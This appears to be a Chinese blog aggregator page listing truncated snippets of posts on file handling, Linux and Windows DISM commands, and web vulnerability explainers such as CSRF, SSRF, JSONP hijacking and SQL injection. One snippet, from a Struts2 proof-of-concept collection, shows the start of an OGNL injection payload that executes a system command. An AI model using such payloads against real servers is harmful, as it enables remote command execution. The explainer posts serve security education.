uploadfiledata漏洞 文件grp-u
批量删除/修改文件名中的某些字符串
### 问题解决 1.首先要批处理文件(夹),放在同一文件目录下。如: ![](https://img-blog.csdnimg.cn/20200907190125650.png) 2.在该目录下,新建文本文件,输入以下代码,如: ![](https://img-blog.csdnimg.cn/20 ......
web基础漏洞-验证码爆破
1、介绍 这里的验证码是指在注册、登录、找回密码、重要操作验证身份时,服务端向用户的手机或者邮箱发送验证码,用户输入匹配成功以验证身份。 验证码爆破漏洞,是服务端未进行次数和时间限制,或者允许的范围过大。导致攻击者可以反复尝试不同的验证码,以获取到正确的验证码。 2、测试 如果是真实攻击环境,一般会 ......
python 读取、写入、追加、覆盖xls文件
python 读取、写入、追加、覆盖xls文件 # 0、写在前面 测试源xls是这样的 ![image-20230529154735527](https://img2023.cnblogs.com/blog/1768648/202305/1768648-20230529155342656-16585 ......
linux常用指令(文件目录操作命令)
(1)ls--列表 ls -al -- 查看当前目录的所有文件及目录详细信息 ls -al /etc -- 查看/etc目录下所有文件及目录详细信息 ll -- 查看当前目录文件及目录的详细信息 -- -a 显示所有文件及目录 (. 开头的隐藏文件也会列出) -- -l 除文件名称外,同时将文件型态 ......
web基础漏洞-ssrf
1、介绍 ssrf,server-server request forgery服务端对服务端的请求伪造,有时也理解为server side request forgery服务端侧的请求伪造。 指服务端借助用户请求中的参数,向服务器内部或者其他服务器发起请求,而这个过程对发起方是信任的,导致出现危害。 ......
web基础漏洞-json劫持
1、定义 json劫持,有时也被称为jsonp劫持,或者划分为csrf的一种类型,说的是同一个对象。 一般csrf,是借用用户登录后的cookie凭证身份,结果是攻击者伪造提交操作类型的请求,即增删改,而几乎无法获取数据。 受害者用户登录目标网站,cookie作为登录凭证,不包含token 网站下存 ......
文件传输只是第一步,文件同步和备份的关键是
有备无患,“备份”的观念早已深入所有信息管理人员的心里。在IT人员信息化安全计划中备份是不可或缺的重要环节。然而,我们还是会经常听到客户抱怨数据备份太慢,文件传输会出现丢失、异常、损坏的情况。那这到底是备份方式有问题还是人员疏忽? 数据备份,保证文件传输高速、稳定只是第一步,其次是文件同步的及时、安 ......
vm -版本 16.2.3 - 将win10 指定磁盘文件夹挂载为linux【centOS 7】的共享磁盘
1.vm配置win10磁盘指定文件夹为共享文件夹, 16.2.3版本不需要安装 vm-tools 2.在linux开启共享文件夹 执行指令 sudo vmhgfs-fuse .host:/ /mnt/hgfs -o subtype=vmhgfs-fuse,allow_other 如果报错 这是因为 ......
IDEA打包可执行jar文件
```xml 4.0.0 com.lingyiitech SapDataTransfer 2.0 8 8 com.sap sapjco3 3.0.8 system ${project.basedir}/lib/sapjco3.jar com.alibaba fastjson 1.2.41 ``` 点 ......
Excel文件导入导出
#### 一、使用POI导出Excel 后端通过response发送: ~~~java public void exportExcel(String[] fieldArray, ArrayList> dataList, HttpServletResponse response) { //HSSF对应 ......
Ajax 上传文件到服务器
1. 页面定义文件标签 ```html ``` 2. JavaScript脚本接收文件 ```javascript var file = document.getElementById("file_update").files[0]; ``` 3. 通过 formDate 打包(formDate 数 ......
Python使用to_csv导出文件时参数注意事项
使用to_csv导出文件时,一定要指定index参数和encoding参数这两个参数; index参数:默认为True,会添加一列标记数据索引。 encoding参数:如果不指定utf_8_sig,使用默认参数值,则导出的文件可能会有乱码或串列。 cake_data.to_csv(r"C:\E\da ......
yarn.lock 文件的工作原理
yarn.lock 文件是 JavaScript 包管理器 Yarn 的核心组件之一,它记录了每个安装的包的确切版本号和依赖关系,并且在项目构建和部署中起着重要的作用。在本文中,我们将深入探讨 yarn.lock 文件的作用、工作原理以及使用方法。 ## 作用 在讨论 yarn.lock 文件的作用 ......
Java-Day-24( 文件 + IO流 )
# Java-Day-24 ## 文件 - 文件就是保存数据的地方 ### 文件流 - 文件在程序中是以流的形式来操作的 - 流:数据在数据源 ( 文件 ) 和程序 ( 内存 ) 之间经历的路程 - 输入流:数据从数据源 ( 文件 ) 到程序 ( 内存 ) 的路径 - 输出流:数据从程序 ( 内存 ......
git 忽略文件
# .gitignore 一般我们总会有些文件无需纳入 Git 的管理,也不希望它们总出现在未跟踪文件列表。 通常都是些自动生成的文件,比如日志文件,或者编译过程中创建的临时文件等。 在这种情况下,我们可以创建一个名为 `.gitignore` 的文件,列出要忽略的文件的模式。 来看一个实际的 `. ......
web基础漏洞-csrf
1、介绍 csrf,cross script request forgery跨站请求伪造。 是受害者用户在登录目标网站A后,攻击者基于社工手段使其在同主机同浏览器环境下,访问攻击者控制的网站B。网站B的页面中伪造请求通过该浏览器提交到网站A,同时携带对网站A保存在浏览器中的cookie登录凭证。使得 ......
web基础漏洞-界面操作劫持
1、介绍 界面操作劫持攻击是一种基于视觉欺骗的web会话劫持攻击,它通过在网页的可见输入控件上覆盖一个不可见的框iframe,使得用户误以为在操作可见控件,而实际上用户的操作行为被不可见的框所劫持,执行不可见框中的恶意劫持代码,从而完成在用户不知情的情况下窃取敏感信息、篡改数据等攻击。 关于界面操作 ......
WEB漏洞—SQL注入之查询方式及报错盲注
前言:当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL 语句大概写法也能更好的选择对应的注入语句。 #补充:上课的Access暴力猜解不出的问题? ......
C++头文件理解
看了下公司内部对于头文件的使用,感觉挺乱的。 ![](https://img2023.cnblogs.com/blog/2135354/202305/2135354-20230529112802546-794351265.png) 对于头文件容易搞混淆的点在于:涉及多文件,多次包含的时候容易搞错 比 ......
大文件切片上传
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>切片上传</title> </head> <body> <script src="https://cdn.bootcdn.net/ajax/libs/spark ......
uniapp安卓选择文件
引用 import {pickFile} from '@/js/common/pickFile.js' 使用 pickFile.PickFile(function(audioSrc){ console.log(audioSrc) _this.audioSrc = 'file://' + audioS ......
Python压缩JS文件,重点是 slimit
摘要:Python Web程序员必看系列,学习如何压缩 JS 代码。 本文分享自华为云社区《Python压缩JS文件,PythonWeb程序员必看系列,重点是 slimit》,作者: 梦想橡皮擦 。 本篇博客将学习压缩 JS 代码,首先要学习的模块是 jsmin。 jsmin 库 Python 中的 ......
idea新文件怎么自动生成用户名
在创建java类后,自动生成定制的注释: ![image](https://img2023.cnblogs.com/blog/2913024/202305/2913024-20230529113148716-392197353.png) * * * 设置过程 点击File->Settings->Ed ......
yaml文件中&、<<、 * 含义
# yaml文件中&、<<、 * 含义 ``` development: &default adapter: postgresql database: dev_development test: &test <<: *default database: test_test cucumber: <<: ......
Struct2系列漏洞POC整理
# Struct2 -001 ```java %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c= ......
使用ESD文件进行安装和升级已经成为常见的做法
ESD (Electronic Software Distribution) 是指微软采用的一种新型软件分发机制,具有空间利用率高、传输速度快、安全性高等特点。在Windows 10系统中,使用ESD文件进行安装和升级已经成为常见的做法。 以下是使用ESD文件安装Windows 10系统的步骤: 下 ......
使用 DISM 工具可以将 WIM 文件转换为 ESD 文件
使用 DISM 工具可以将 WIM 文件转换为 ESD 文件,以下是使用 DISM 命令将 WIM 文件转换为 ESD 文件的步骤: 打开 PowerShell 窗口或管理员权限的命令提示符。 输入以下命令来挂载 WIM 文件。 Copy Code dism /Mount-Image /ImageF ......
使用 DISM 命令将 ESD 文件转换为 WIM 文件的步骤
使用 DISM 工具可以将 ESD 文件转换为 WIM 文件,以便进行更广泛的操作。下面是使用 DISM 命令将 ESD 文件转换为 WIM 文件的步骤: 打开 PowerShell 窗口或管理员权限的命令提示符。 输入以下命令来挂载 ESD 文件。 Copy Code dism /Mount-Im ......
DISM 支持以下格式的映像文件
DISM 支持以下格式的映像文件: Windows 映像文件 (WIM):包含 Windows 操作系统、驱动程序和应用程序; 虚拟硬盘文件 (VHD):用于在虚拟机环境中运行 Windows 操作系统; 虚拟硬盘文件 (VHDX):Windows Server 2012 引入的一种新型虚拟硬盘文件 ......